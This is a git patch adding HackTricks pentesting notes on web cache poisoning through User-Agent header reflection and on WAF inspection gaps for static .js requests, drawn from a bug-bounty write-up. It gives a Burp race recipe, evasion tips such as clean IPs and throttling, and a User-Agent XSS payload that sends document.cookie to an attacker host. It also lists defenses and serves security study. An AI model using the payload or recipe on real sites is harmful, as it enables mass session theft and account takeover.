From d6a776e9d03a17ad1de63960cdfd0f0afe00fa83 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Tue, 19 Aug 2025 01:31:47 +0000
Subject: [PATCH] Add content from: How I found a 0-Click Account takeover in a
 public BBP and l...

---
 src/pentesting-web/cache-deception/README.md  | 43 +++++++++++++++++--
 .../proxy-waf-protections-bypass.md           | 23 ++++++++--
 2 files changed, 59 insertions(+), 7 deletions(-)

diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md
index 8a555208c..5af836d4c 100644
--- a/src/pentesting-web/cache-deception/README.md
+++ b/src/pentesting-web/cache-deception/README.md
@@ -172,6 +172,44 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
 
 Example usage: `wcvs -u example.com`
 
+### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js)
+
+This real-world pattern chains a header-based reflection primitive with CDN/WAF behavior to reliably poison the cached HTML served to other users:
+
+- The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context.
+- The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets.
+- Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection.
+
+Practical recipe (observed across a popular CDN/WAF):
+
+1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace.
+2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best):
+   - First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`.
+   - Immediately after: GET the main page (`/`).
+3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`).
+
+Example header payload (to exfiltrate non-HttpOnly cookies):
+
+```
+User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oastify.com?a='+document.cookie</script>"
+```
+
+Operational tips:
+
+- Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers.
+- Using an IP from the CDN's own cloud sometimes improves routing consistency.
+- If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context.
+
+Impact:
+
+- If session cookies aren’t `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML.
+
+Defenses:
+
+- Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers.
+- Ensure WAF applies content inspection consistently to `.js` requests and static paths.
+- Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies.
+
 ## Vulnerable Examples
 
 ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
@@ -245,9 +283,8 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
 - [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
 - [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
 - [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
+- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
+- [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace)
 
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md
index 62ffec5fb..fd092f625 100644
--- a/src/pentesting-web/proxy-waf-protections-bypass.md
+++ b/src/pentesting-web/proxy-waf-protections-bypass.md
@@ -131,7 +131,24 @@ By default, the WAF inspects only the first 8KB of a request. It can increase th
 
 Up to 128KB.
 
-### Obfuscation <a href="#obfuscation" id="obfuscation"></a>
+### Static assets inspection gaps (.js GETs)
+
+Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with `.js`), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses.
+
+Practical use cases:
+
+- Send payloads in untrusted headers (e.g., `User-Agent`) on a GET to a `.js` path to avoid content inspection, then immediately request the main HTML to influence the cached variant.
+- Use a fresh/clean IP; once an IP is flagged, routing changes can make the technique unreliable.
+- In Burp Repeater, use "Send group in parallel" (single-packet style) to race the two requests (`.js` then HTML) through the same front-end path.
+
+This pairs well with header-reflection cache poisoning. See:
+
+- {{#ref}}
+cache-deception/README.md
+{{#endref}}
+- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
+
+### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a>
 
 ```bash
 # IIS, ASP Clasic
@@ -223,9 +240,7 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
 - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
 - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
 - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
+- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
 
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-